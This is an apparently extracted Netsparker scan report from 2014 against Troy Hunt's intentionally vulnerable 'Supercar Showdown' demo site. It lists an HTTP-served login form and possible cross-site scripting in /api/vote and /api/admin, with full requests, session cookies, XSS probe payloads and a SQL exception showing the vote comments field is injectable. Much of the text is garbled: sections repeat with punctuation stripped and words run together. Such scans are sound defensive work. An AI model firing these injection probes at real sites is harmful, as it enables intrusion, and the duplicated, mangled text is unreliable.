lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
Response:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2549
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Log in - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li><l…
26 57
3 TOTAL | MEDIUM
9 [Possible] Cross-site Scripting
Netsparker detected possible cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Although Netsparker believes there is a cross-site scripting in here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.
Impact: There are many different attacks that can be leveraged through the use of XSS, including:
- Hijacking the user's active session
- Changing the look of the page within the victim's browser
- Mounting a successful phishing attack
- Intercepting data and performing man-in-the-middle attacks
Remedy: This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered/encoded. Output should be filtered/encoded according to the output format and location.
There are a number of pre-defined, well structured whitelist libraries available for many different environments. Good examples of these include the OWASP Reform and Microsoft Anti-cross-site scripting libraries.
Remedy References: [ASP.NET] - Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet
External References: XSS Cheat Sheet; OWASP - cross-site scripting; XSS Shell; XSS Tunnelling
Classification: OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
9.1 /api/vote
http://hackyourselffirst.troyhunt.com/api/vote
Parameters:
Parameter   | Type | Value
userId      | POST | 1
supercarId  | POST | 3
comments    | POST | '"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>
Notes: Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
Certainty:
27 57
Request:
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 90
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments='"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>
Response:
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:47 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2985
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Unclosed quotation mark after the character string '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>')'.\r\nIncorrect syntax near '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>')'.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)\r\n   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)\r\n   at System.Data.SqlClient.SqlCommand.RunExecuteNonQueryTds(String methodName, Boolean async, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(TaskCompletionSource`1 completion, String methodName, Boolean sendToPipe, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.ExecuteNonQuery()\r\n   at Web.Controllers.VoteController.Post(Vote vote)\r\n   at lambda_method(Closure , Object , Object[] )\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.<>c__DisplayClass10.<GetExecutor>b__9(Object instance, Object[] methodParameters)\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.Execute(Object instanc…
9.2 /api/admin
http://hackyourselffirst.troyhunt.com/api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt
Parameters:
Parameter | Type | Value
nsextt    | GET  | "--></style></scRipt><scRipt>netsparker(0x0002E0)</scRipt>
Notes: Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
Certainty:
Request:
GET /api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x0002E0)%3C/scRipt%3E HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
28 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
